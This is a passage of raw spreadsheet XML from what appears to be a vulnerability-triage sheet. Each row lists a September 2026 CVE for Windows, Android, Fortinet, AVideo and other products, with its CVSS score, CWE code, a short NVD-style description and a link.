t="inlineStr"><is><t>New</t></is></c><c r="C357" s="5" t="inlineStr"><is><t>CVE-2026-82066</t></is></c><c r="D357" s="5" t="n"><v>8.1</v></c><c r="E357" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G357" s="5" t="inlineStr" /><c r="H357" s="5" t="n"><v>0.002</v></c><c r="I357" s="5" t="inlineStr" /><c r="J357" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K357" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L357" s="5" t="inlineStr" /><c r="M357" s="5" t="inlineStr" /><c r="N357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O357" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P357" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q357" s="5" t="inlineStr" /><c r="R357" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S357" s="5" t="inlineStr"><is><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is></c><c r="T357" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t></is></c></row><row r="358"><c r="A358" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B358" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C358" s="5" t="inlineStr"><is><t>CVE-2026-83527</t></is></c><c r="D358" s="5" t="n"><v>8.1</v></c><c r="E358" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F358" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G358" s="5" t="inlineStr" /><c r="H358" s="5" t="n"><v>0.015</v></c><c r="I358" s="5" t="inlineStr" /><c r="J358" s="5" t="inlineStr" /><c r="K358" s="5" t="inlineStr" /><c r="L358" s="5" t="inlineStr" /><c r="M358" s="5" t="inlineStr" /><c r="N358" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O358" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P358" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q358" s="5" t="inlineStr" /><c r="R358" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S358" s="5" t="inlineStr"><is><t>An Authentication Bypass vulnerability in Sentry before R10.8.2, R10.7.3 and R10.6.4 allows a remote unauthenticated attacker to gain administrative level access.</t></is></c><c r="T358" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83527</t></is></c></row><row r="359"><c r="A359" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B359" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C359" s="5" t="inlineStr"><is><t>CVE-2026-83997</t></is></c><c r="D359" s="5" t="n"><v>8.1</v></c><c r="E359" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F359" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G359" s="5" t="inlineStr" /><c r="H359" s="5" t="n"><v>0.005</v></c><c r="I359" s="5" t="inlineStr" /><c r="J359" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K359" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L359" s="5" t="inlineStr" /><c r="M359" s="5" t="inlineStr" /><c r="N359" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O359" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P359" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q359" s="5" t="inlineStr" /><c r="R359" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S359" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T359" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t></is></c></row><row r="360"><c r="A360" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B360" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C360" s="5" t="inlineStr"><is><t>CVE-2026-84393</t></is></c><c r="D360" s="5" t="n"><v>8.1</v></c><c r="E360" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F360" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G360" s="5" t="inlineStr" /><c r="H360" s="5" t="n"><v>0.002</v></c><c r="I360" s="5" t="inlineStr" /><c r="J360" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K360" s="5" t="inlineStr" /><c r="L360" s="5" t="inlineStr" /><c r="M360" s="5" t="inlineStr" /><c r="N360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O360" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P360" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q360" s="5" t="inlineStr" /><c r="R360" s="5" t="inlineStr"><is><t>CWE-297</t></is></c><c r="S360" s="5" t="inlineStr"><is><t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t></is></c><c r="T360" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t></is></c></row><row r="361"><c r="A361" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B361" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C361" s="5" t="inlineStr"><is><t>CVE-2026-86720</t></is></c><c r="D361" s="5" t="n"><v>8.1</v></c><c r="E361" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G361" s="5" t="inlineStr" /><c r="H361" s="5" t="n"><v>0.003</v></c><c r="I361" s="5" t="inlineStr" /><c r="J361" s="5" t="inlineStr" /><c r="K361" s="5" t="inlineStr" /><c r="L361" s="5" t="inlineStr" /><c r="M361" s="5" t="inlineStr" /><c r="N361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q361" s="5" t="inlineStr" /><c r="R361" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S361" s="5" t="inlineStr"><is><t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to validate ownership of live_restreams_id in resendRestreamer.json.php, allowing authenticated users with canStream to access other users' restream destinations. Attackers can broadcast their live stream to victim-configured restream destinations by supplying arbitrary live_restreams_id values, hijacking YouTube, Facebook, or Twitch streams using victim stream keys.</t></is></c><c r="T361" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86720</t></is></c></row><row r="362"><c r="A362" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B362" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C362" s="5" t="inlineStr"><is><t>CVE-2026-86723</t></is></c><c r="D362" s="5" t="n"><v>8.1</v></c><c r="E362" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G362" s="5" t="inlineStr" /><c r="H362" s="5" t="n"><v>0.003</v></c><c r="I362" s="5" t="inlineStr" /><c r="J362" s="5" t="inlineStr" /><c r="K362" s="5" t="inlineStr" /><c r="L362" s="5" t="inlineStr" /><c r="M362" s="5" t="inlineStr" /><c r="N362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q362" s="5" t="inlineStr" /><c r="R362" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S362" s="5" t="inlineStr"><is><t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 contains an authentication bypass vulnerability in LoginControl::verifyChallenge() that uses loose comparison (==) instead of strict comparison (===) against unset session values. Attackers with only a password can submit an empty request to verifyChallenge.json.php to bypass PGP two-factor authentication and gain full authenticated access.</t></is></c><c r="T362" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86723</t></is></c></row><row r="363"><c r="A363" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B363" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C363" s="5" t="inlineStr"><is><t>CVE-2026-28662</t></is></c><c r="D363" s="5" t="n"><v>8</v></c><c r="E363" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F363" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G363" s="5" t="inlineStr" /><c r="H363" s="5" t="n"><v>0.001</v></c><c r="I363" s="5" t="inlineStr" /><c r="J363" s="5" t="inlineStr" /><c r="K363" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L363" s="5" t="inlineStr" /><c r="M363" s="5" t="inlineStr" /><c r="N363" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O363" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P363" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q363" s="5" t="inlineStr" /><c r="R363" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="S363" s="5" t="inlineStr"><is><t>In p2p_process_prov_disc_bootstrap_req of p2p_pd.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T363" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28662</t></is></c></row><row r="364"><c r="A364" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B364" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C364" s="5" t="inlineStr"><is><t>CVE-2026-55277</t></is></c><c r="D364" s="5" t="n"><v>8</v></c><c r="E364" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F364" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G364" s="5" t="inlineStr" /><c r="H364" s="5" t="n"><v>0.001</v></c><c r="I364" s="5" t="inlineStr" /><c r="J364" s="5" t="inlineStr" /><c r="K364" s="5" t="inlineStr" /><c r="L364" s="5" t="inlineStr" /><c r="M364" s="5" t="inlineStr" /><c r="N364" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q364" s="5" t="inlineStr" /><c r="R364" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S364" s="5" t="inlineStr"><is><t>In checkUiccListenConfigNeeded of RoutingManager.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T364" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55277</t></is></c></row><row r="365"><c r="A365" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B365" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C365" s="5" t="inlineStr"><is><t>CVE-2026-68827</t></is></c><c r="D365" s="5" t="n"><v>8</v></c><c r="E365" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F365" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G365" s="5" t="inlineStr" /><c r="H365" s="5" t="n"><v>0.004</v></c><c r="I365" s="5" t="inlineStr" /><c r="J365" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K36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65" s="5" t="inlineStr" /><c r="M365" s="5" t="inlineStr" /><c r="N365" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O365" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P365" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q365" s="5" t="inlineStr" /><c r="R365" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S365" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows GDI+ allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T365" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68827</t></is></c></row><row r="366"><c r="A366" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B366" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C366" s="5" t="inlineStr"><is><t>CVE-2026-68834</t></is></c><c r="D366" s="5" t="n"><v>8</v></c><c r="E366" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F366" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G366" s="5" t="inlineStr" /><c r="H366" s="5" t="n"><v>0.006</v></c><c r="I366" s="5" t="inlineStr" /><c r="J366" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K36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66" s="5" t="inlineStr" /><c r="M366" s="5" t="inlineStr" /><c r="N366" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O366" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P366" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q366" s="5" t="inlineStr" /><c r="R366" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S366" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T366" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t></is></c></row><row r="367"><c r="A367" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B367" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C367" s="5" t="inlineStr"><is><t>CVE-2026-68838</t></is></c><c r="D367" s="5" t="n"><v>8</v></c><c r="E367" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F367" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G367" s="5" t="inlineStr" /><c r="H367" s="5" t="n"><v>0.004</v></c><c r="I367" s="5" t="inlineStr" /><c r="J367" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K36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67" s="5" t="inlineStr" /><c r="M367" s="5" t="inlineStr" /><c r="N367" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O367" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P367" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q367" s="5" t="inlineStr" /><c r="R367" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S367" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T367" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t></is></c></row><row r="368"><c r="A368" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B368" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C368" s="5" t="inlineStr"><is><t>CVE-2026-68876</t></is></c><c r="D368" s="5" t="n"><v>8</v></c><c r="E368" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F368" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G368" s="5" t="inlineStr" /><c r="H368" s="5" t="n"><v>0.007</v></c><c r="I368" s="5" t="inlineStr" /><c r="J368" s="5" t="inlineStr" /><c r="K368" s="5" t="inlineStr" /><c r="L368" s="5" t="inlineStr" /><c r="M368" s="5" t="inlineStr" /><c r="N368" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O368" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P368" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q368" s="5" t="inlineStr" /><c r="R368" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S368" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T368" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68876</t></is></c></row><row r="369"><c r="A369" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B369" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C369" s="5" t="inlineStr"><is><t>CVE-2026-68878</t></is></c><c r="D369" s="5" t="n"><v>8</v></c><c r="E369" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F369" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G369" s="5" t="inlineStr" /><c r="H369" s="5" t="n"><v>0.005</v></c><c r="I369" s="5" t="inlineStr" /><c r="J369" s="5" t="inlineStr" /><c r="K369" s="5" t="inlineStr" /><c r="L369" s="5" t="inlineStr" /><c r="M369" s="5" t="inlineStr" /><c r="N369" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O369" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P369" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q369" s="5" t="inlineStr" /><c r="R369" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S369" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Fast FAT Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T369" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68878</t></is></c></row><row r="370"><c r="A370" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B370" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C370" s="5" t="inlineStr"><is><t>CVE-2026-68880</t></is></c><c r="D370" s="5" t="n"><v>8</v></c><c r="E370" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F370" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G370" s="5" t="inlineStr" /><c r="H370" s="5" t="n"><v>0.004</v></c><c r="I370" s="5" t="inlineStr" /><c r="J370" s="5" t="inlineStr" /><c r="K370" s="5" t="inlineStr" /><c r="L370" s="5" t="inlineStr" /><c r="M370" s="5" t="inlineStr" /><c r="N370" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O370" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P370" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q370" s="5" t="inlineStr" /><c r="R370" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S370" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T370" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68880</t></is></c></row><row r="371"><c r="A371" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B371" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C371" s="5" t="inlineStr"><is><t>CVE-2026-68894</t></is></c><c r="D371" s="5" t="n"><v>8</v></c><c r="E371" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F371" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G371" s="5" t="inlineStr" /><c r="H371" s="5" t="n"><v>0.006</v></c><c r="I371" s="5" t="inlineStr" /><c r="J371" s="5" t="inlineStr" /><c r="K371" s="5" t="inlineStr" /><c r="L371" s="5" t="inlineStr" /><c r="M371" s="5" t="inlineStr" /><c r="N371" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O371" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P371" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q371" s="5" t="inlineStr" /><c r="R371" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S371" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T371" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68894</t></is></c></row><row r="372"><c r="A372" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B372" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C372" s="5" t="inlineStr"><is><t>CVE-2026-69271</t></is></c><c r="D372" s="5" t="n"><v>8</v></c><c r="E372" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F372" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G372" s="5" t="inlineStr" /><c r="H372" s="5" t="n"><v>0.007</v></c><c r="I372" s="5" t="inlineStr" /><c r="J372" s="5" t="inlineStr" /><c r="K372" s="5" t="inlineStr" /><c r="L372" s="5" t="inlineStr" /><c r="M372" s="5" t="inlineStr" /><c r="N372" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q372" s="5" t="inlineStr" /><c r="R372" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S372" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T372" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69271</t></is></c></row><row r="373"><c r="A373" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B373" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C373" s="5" t="inlineStr"><is><t>CVE-2026-69301</t></is></c><c r="D373" s="5" t="n"><v>8</v></c><c r="E373" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F373" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G373" s="5" t="inlineStr" /><c r="H373" s="5" t="n"><v>0.008</v></c><c r="I373" s="5" t="inlineStr" /><c r="J373" s="5" t="inlineStr" /><c r="K373" s="5" t="inlineStr" /><c r="L373" s="5" t="inlineStr" /><c r="M373" s="5" t="inlineStr" /><c r="N373" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O373" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P373" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q373" s="5" t="inlineStr" /><c r="R373" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S373" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T373" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69301</t></is></c></row><row r="374"><c r="A374" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B374" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C374" s="5" t="inlineStr"><is><t>CVE-2026-69322</t></is></c><c r="D374" s="5" t="n"><v>8</v></c><c r="E374" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F374" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G374" s="5" t="inlineStr" /><c r="H374" s="5" t="n"><v>0.007</v></c><c r="I374" s="5" t="inlineStr" /><c r="J374" s="5" t="inlineStr" /><c r="K374" s="5" t="inlineStr" /><c r="L374" s="5" t="inlineStr" /><c r="M374" s="5" t="inlineStr" /><c r="N374" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O374" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P374" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q374" s="5" t="inlineStr" /><c r="R374" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S374" s="5" t="inlineStr"><is><t>Double free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T374" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69322</t></is></c></row><row r="375"><c r="A375" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B375" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C375" s="5" t="inlineStr"><is><t>CVE-2026-69332</t></is></c><c r="D375" s="5" t="n"><v>8</v></c><c r="E375" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F375" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G375" s="5" t="inlineStr" /><c r="H375" s="5" t="n"><v>0.007</v></c><c r="I375" s="5" t="inlineStr" /><c r="J375" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K37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75" s="5" t="inlineStr" /><c r="M375" s="5" t="inlineStr" /><c r="N375" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O375" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P375" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q375" s="5" t="inlineStr" /><c r="R375" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S375" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T375" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t></is></c></row><row r="376"><c r="A376" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B376" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C376" s="5" t="inlineStr"><is><t>CVE-2026-69346</t></is></c><c r="D376" s="5" t="n"><v>8</v></c><c r="E376" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F376" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G376" s="5" t="inlineStr" /><c r="H376" s="5" t="n"><v>0.007</v></c><c r="I376" s="5" t="inlineStr" /><c r="J376" s="5" t="inlineStr" /><c r="K376" s="5" t="inlineStr" /><c r="L376" s="5" t="inlineStr" /><c r="M376" s="5" t="inlineStr" /><c r="N376" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O376" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P376" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q376" s="5" t="inlineStr" /><c r="R376" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S376" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T376" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69346</t></is></c></row><row r="377"><c r="A377" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B377" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C377" s="5" t="inlineStr"><is><t>CVE-2026-69365</t></is></c><c r="D377" s="5" t="n"><v>8</v></c><c r="E377" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F377" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G377" s="5" t="inlineStr" /><c r="H377" s="5" t="n"><v>0.007</v></c><c r="I377" s="5" t="inlineStr" /><c r="J377" s="5" t="inlineStr" /><c r="K377" s="5" t="inlineStr" /><c r="L377" s="5" t="inlineStr" /><c r="M377" s="5" t="inlineStr" /><c r="N377" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O377" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P377" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q377" s="5" t="inlineStr" /><c r="R377" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S377" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T377" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69365</t></is></c></row><row r="378"><c r="A378" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B378" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C378" s="5" t="inlineStr"><is><t>CVE-2026-69371</t></is></c><c r="D378" s="5" t="n"><v>8</v></c><c r="E378" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F378" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G378" s="5" t="inlineStr" /><c r="H378" s="5" t="n"><v>0.007</v></c><c r="I378" s="5" t="inlineStr" /><c r="J378" s="5" t="inlineStr" /><c r="K378" s="5" t="inlineStr" /><c r="L378" s="5" t="inlineStr" /><c r="M378" s="5" t="inlineStr" /><c r="N378" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O378" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P378" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q378" s="5" t="inlineStr" /><c r="R378" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S378" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T378" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69371</t></is></c></row><row r="379"><c r="A379" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B379" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C379" s="5" t="inlineStr"><is><t>CVE-2026-69412</t></is></c><c r="D379" s="5" t="n"><v>8</v></c><c r="E379" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F379" s="5" 